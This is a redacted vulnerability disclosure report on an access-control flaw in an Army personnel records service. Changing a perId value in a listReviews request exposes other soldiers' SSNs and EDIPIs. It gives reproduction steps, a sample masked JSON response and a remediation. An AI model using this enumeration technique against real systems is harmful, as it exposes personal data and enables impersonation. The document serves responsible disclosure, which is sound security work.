██████ SSN/EDPI

**Description:** With some simple URL manipulation, an authenticated user is able to request other soldiers SSN, perID, EDPI. ## References CWE-200 - Information Disclosure CWE-284 - Improper Access Control Collaborators: theonetruepengu hxhbrofessor ## Impact After pulling an perID, someone would have access to view their SSN, EDPI. With most recent breaches of SSNs, one attacker would have enough information to verify and impersonate another soldier for malicious purposes. ## System Host(s) ████, ██████████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Authenticate to https://████████/#/soldierRecord/ Run your browsers developer mode. Then look for the network request:"listReviews?perId=######" https://███████/svc/reviewController/listReviews?perId=###### If you load that page with random numbers you will be able to see all soldier PII. If the soldier associated to the perID is no longer in the Army, the information is Null. [{"perId":3643051,"ssn":"XXXXXXXXX","edipi":"XXXXXXXXXX","soldierName":"HRABAK X X","type":"P","typeFull":"PERSONNEL RECORDS REVIEW","mode":null,"createDt":1642087763000,"status":"C","statusFull":"COMPLETE","statusDt":1645994091000,"dueDt":1677530091000,"domId":"AV","error":"N","soldierAbsence":null,"soldierAbsenceRemark":null,"reviewer":978715,"reviewerSignDt":1645994091000,"reviewerRemark":null,"soldierSignDt":1645994016000,"soldierRemark":null,"permMissingDocs":null,"tempMissingDocs":null,"emailList":null,"lockDt":null,"reviewFolder":null,"method":"I","documents":null,"cases":null,"lesPresent":false,"srbPresent":false,"lesVerified":true,"srbVerified":true,"prevSignDate":1645994016000,"inProgress":false,"reviewerComplete":false,"soldierComplete":true,"supportingDocsVerified":true,"reviewerSigned":true,"soldierSigned":true}] ## Suggested Mitigation/Remediation Actions Correct permissions on access to these URLs. Authenticated users should be checked against their own ID and data.